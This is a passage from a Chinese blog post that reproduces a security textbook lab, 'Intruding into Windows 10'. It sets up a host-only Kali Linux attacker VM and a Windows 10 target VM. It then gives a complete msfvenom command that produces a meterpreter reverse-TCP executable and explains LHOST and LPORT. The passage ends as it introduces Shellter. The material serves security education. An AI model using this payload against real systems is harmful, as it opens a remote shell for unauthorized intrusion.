信息安全技術實用教程-第4版---張同光---ISBN-9787121423031---4.4實例——入侵Windows10

信息安全技術實用教程-第4版---張同光---ISBN-9787121423031---4.4實例——入侵Windows10

https://my.oschina.net/ztguang/blog/5329391

主  編:     張同光

ISBN號: 978-7-121-42303-1             9787121423031
出版日期:   2021-11-20
出版社:     電子工業出版社

頁碼:  定價:¥69.80元
 

4.4  實例——入侵Windows 10

1.實驗環境

實驗環境如4.1所示使用2個虛擬機(Windows10_1703_x86_enKaliLinux和宿主機(Windows 10),2個虛擬機的網絡連接方式選擇“僅主機(Host-Only)網絡”宿主機和2個虛擬機的IP地址、三個系統之間的網絡連通性4.2所示兩個虛擬機分別Kali Linux 2020Windows 10Windows 10 1703作爲被滲透的目標機,Kali Linux作爲攻擊機。

 

 

 4.1  實驗環境

 

 4.2  三個系統的IP地址及其之間的網絡連通性

2入侵過程

1步:執行msfvenom命令

4.3所示Kali Linux終端窗口中執行如下命令

msfvenom -p windows/meterpreter/reverse_tcp -a x86 platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe

上面msfvenom命令生成32Windows可執行文件kali2win10.exe,該文件實現反向TCP連接必須指定爲.exe類型,並且必須定義本地主機(LHOST)和本地端口(LPORT)。該實例中LHOST是攻擊機的IP地址,LPORT是一個端口,一旦目標機受到攻擊,它就會監聽目標機的連接。

 

 4.3  執行msfvenom命令

2步:下載並運行Shellter

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章